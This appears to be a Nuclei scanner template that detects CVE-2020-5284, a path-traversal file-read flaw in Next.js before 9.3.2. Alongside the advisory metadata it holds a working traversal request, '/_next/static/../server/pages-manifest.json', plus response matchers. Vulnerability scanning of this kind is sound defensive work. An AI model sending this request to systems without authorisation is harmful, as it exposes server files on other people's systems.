nuclei-templates/http/cves/2020/CVE-2020-5284.yaml

49 lines
1.6 KiB
YAML

id: CVE-2020-5284
info:
name: Next.js <9.3.2 - Local File Inclusion
author: rootxharsh,iamnoooob,dwisiswant0
severity: medium
description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.
remediation: This issue is fixed in version 9.3.2.
reference:
- https://github.com/zeit/next.js/releases/tag/v9.3.2
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
- https://nvd.nist.gov/vuln/detail/CVE-2020-5284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2020-5284
cwe-id: CWE-22,CWE-23
epss-score: 0.00152
epss-percentile: 0.51282
cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeit
product: next.js
tags: cve,cve2020,nextjs,lfi
http:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/json"
- type: regex
part: body
regex:
- '\{"/_app":".*?_app\.js"'
- type: status
status:
- 200
# digest: 4a0a00473045022100bc13ce92034a49d92ee0f6b32af085e25251ba8bcc1f0fe31bf4f6d4d44ad8e3022030aaa3e594c684f1469bf60cdda706bb7596abfd16ffbd7bf76c88328a1c7c8f:922c64590222798bb761d5b6d8e72950